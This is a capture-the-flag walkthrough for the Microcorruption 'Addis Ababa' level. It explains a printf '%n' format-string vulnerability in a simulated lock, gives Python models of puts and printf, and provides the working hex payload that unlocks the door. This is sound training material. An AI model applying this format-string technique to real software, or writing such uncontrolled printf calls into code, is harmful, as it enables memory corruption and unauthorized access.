Microcorruption 0x0A - Addis Ababa

Prev: 0x09 Santa Cruz
Next: 0x0B Novosibirsk

The manual for this level calls out a new feature: “Usernames are printed back to the user for verification.” Prior levels did this for both the username and password, so why is this being called out as new?


Well, if we take a look in “main” we see that strings are now printed with “printf” instead of “puts.” Depending on your experience with binary exploits, this may or may not jump out at you, but I’ll assume no prior knowledge and we’ll start by comparing the two functions.

If we hop back into the last level, we can see that “puts” is a fairly simple function of ~20 instructions. It takes the address of a string and iterates over each byte, checking for null. If the byte is not null, it calls INT 0, which according to the lock manual is the “putchar” interrupt that prints a single character to the display. If the byte is null (indicating the end of the string), the function exits. Got it.
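To make the contrast with "printf" concrete, here is a minimal Python sketch of the loop described above. It is a model of the behavior, not the lock's actual code: the name "puts_model" and the flat "memory" buffer are made up for illustration, and appending to a list stands in for the putchar interrupt.

```python
def puts_model(memory: bytes, addr: int) -> str:
    """Walk bytes starting at addr and emit each one until a null byte is hit."""
    out = []
    while memory[addr] != 0:
        out.append(chr(memory[addr]))  # stand-in for INT 0 (putchar)
        addr += 1
    return "".join(out)


# Hypothetical memory contents: our input followed by a null terminator.
memory = b"AA%n\x00leftover"
print(puts_model(memory, 0))
```

Note that the "%n" comes out as plain text here. A function like this never interprets its input, which is exactly what changes with "printf."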

“printf,” however, is a different beast: it contains over 100 instructions! Instead of walking through it line-by-line, if we give it a quick scan we notice several compares that seem to be dictating the flow. Specifically, there’s an initial “cmp.b” with “0x25,” the ASCII hex value for “%.” Then, there are some other “cmp.b” instructions that compare other hex values which translate to the ASCII characters “s,” “x,” “c,” and “n.” These are the "conversion specifiers," AKA ways to format the output, hence the "f" in "printf" which stands for "format."
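If you want to double-check which characters those compare constants correspond to, a couple of lines of Python will do it. The dictionary name "SPECIFIER_BYTES" is just for illustration.

```python
# Map each character printf compares against to its ASCII byte value.
SPECIFIER_BYTES = {ch: ord(ch) for ch in "%sxcn"}

for ch, value in SPECIFIER_BYTES.items():
    print(f"{ch!r} -> 0x{value:02x}")
```

The values for "%" and "n" (0x25 and 0x6e) are the ones that matter for the rest of this level.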

Fortunately, “printf” has a good overview in the lock manual so we don’t have to reverse-engineer these ourselves:


Surely this new function is the focus of the level, so how can we exploit it? Let’s first try to understand the remaining program flow so we can understand our objective.


Continuing beyond the “printf” call at 447c (which is used to print our string to the console), we see a “tst 0x0(sp)” which checks whether the value stored at the address sp points to is zero. If it is, we jump to an error message and exit. If not, we go to our favorite “unlock_door” function. So, to exploit the program and unlock the door, we can either do what we've done in previous levels and try to overwrite a saved return address on the stack with the address of this “unlock_door” function, or we can overwrite the zero at address 4288, which is where sp is pointing during the aforementioned “tst” instruction, with any nonzero value.

If we look at the explanation for “printf,” it’s not readily apparent whether any of these conversion characters will aid us in either pursuit, but our prior exploit research helps us to recognize “%n” as having a role in the (now fairly uncommon) format string exploits, so let's use that as our starting point. Let’s break after the “cmp.b #0x6e” instruction at 46b2 (which checks if our modifier after the "%" is "n"), run the program, and enter the string “AA%n” when prompted.

At first glance, the first instruction "mov @r9, r15" doesn't mean much to us. If we check r9, we find the stack address "4272," which is where sp is pointing as well. The value stored there - currently null - is placed into r15. Then, in the following instruction, the value in r10 is written to the address now held in r15. Inspecting r10, we can see that it's 0x4, so r10 must hold the current count of characters read into printf thus far, which matches the explanation of the "%n" conversion character from the manual.

Continuing, we can see that r9 is incremented, and then the next character of our input is tested to see if it's zero, exiting the program if it is. But wait, r9 was incremented, and we can't see anywhere else that it was used within this function. If we enter "%n" a second time, will the "mov @r9, r15" and "mov r10, 0x0(r15)" instructions write to the next address on the stack - 4276? And if we enter "%n" even more, will r9 continue to be incremented until we eventually reach the address of our string, meaning that we can write to whatever address we provide - such as 4288, the byte that's tested prior to calling "unlock_door?"


In theory, this could work, but we're not sure yet how "printf" will handle additional conversion characters. Let's first enter two "%n" to observe what happens. We'll break at the 0x6e comparison at 46b2 and run the program with "AA%n%n" as our input. When we hit the break, we notice something different than we expected:


At this point, r9 is still equivalent to sp, though it is about to be incremented to 4272, meaning that @r9 is... "4141?" The first two bytes of our string?

This is actually extremely fortunate for us! The first two bytes of our string are copied to where r9 is pointing (4272) after "%n" is processed once. But will it still process the second "%n" and attempt to write to that address?

Yes! If we finish running the program, we see that the program attempts the "mov @r9, r15" and "mov r10, 0x0(r15)" instructions again and crashes, since it cannot write to address 4141. If we resubmit our input, but replace "AA" with the address 4288, we'll write 0x2 to that address, pass the test on that value (instruction at address 448a) and unlock the door!
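Here is a toy Python model of that behavior, to show why the second "%n" ends up writing through the first two bytes of our own string. This is a sketch under assumptions, not a reimplementation of the lock's "printf": it only understands "%n", it counts printed characters only, and the layout (string at 4272, first argument slot one word below it, flag at 4288) is borrowed from the walkthrough and should be confirmed in the debugger. All names are made up for illustration.

```python
import struct

MEM_SIZE = 0x10000      # 64 KiB address space of a 16-bit machine
STRING_ADDR = 0x4272    # assumed: where our input string sits on the stack
FLAG_ADDR = 0x4288      # assumed: the word tested before unlock_door


def printf_model(mem: bytearray, fmt_addr: int, arg_ptr: int) -> int:
    """Toy printf that handles only "%n"; returns the count of printed characters."""
    printed = 0
    i = fmt_addr
    while mem[i] != 0:
        if mem[i] == 0x25 and mem[i + 1] == 0x6E:               # "%n"
            target = struct.unpack_from("<H", mem, arg_ptr)[0]  # like mov @r9, r15
            struct.pack_into("<H", mem, target, printed)        # like mov r10, 0x0(r15)
            arg_ptr += 2                                        # advance to the next argument word
            i += 2
        else:
            printed += 1                                        # an ordinary character is printed
            i += 1
    return printed


mem = bytearray(MEM_SIZE)
payload = bytes.fromhex("8842256e256e")   # address bytes followed by "%n%n"
mem[STRING_ADDR:STRING_ADDR + len(payload)] = payload

# Assumed: the first argument slot is the (zeroed) word just below the string.
printf_model(mem, STRING_ADDR, STRING_ADDR - 2)

flag = struct.unpack_from("<H", mem, FLAG_ADDR)[0]
print(hex(flag))
```

In this model the first "%n" consumes the zeroed word and the second one reads "8842" as a little-endian pointer, so the flag word becomes nonzero. The exact value written does not matter for the exploit, only that it is not zero.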

Enter "8842256e256e" as your hex input, and we're in! ("8842" is the address 4288 in little-endian byte order, and "256e" is the hex equivalent of the ASCII "%n.")
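If you'd rather not assemble the hex by hand, the input can be built with a few lines of Python. The variable names are just for illustration, and the target address is the one used in this walkthrough.

```python
import struct

FLAG_ADDR = 0x4288  # the word tested before unlock_door, per this walkthrough

# "<H" packs a 16-bit value in little-endian order, so 0x4288 becomes bytes 88 42.
payload = struct.pack("<H", FLAG_ADDR) + b"%n%n"
print(payload.hex())  # 8842256e256e
```

Packing the address this way avoids the easy mistake of typing the bytes in the wrong order.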
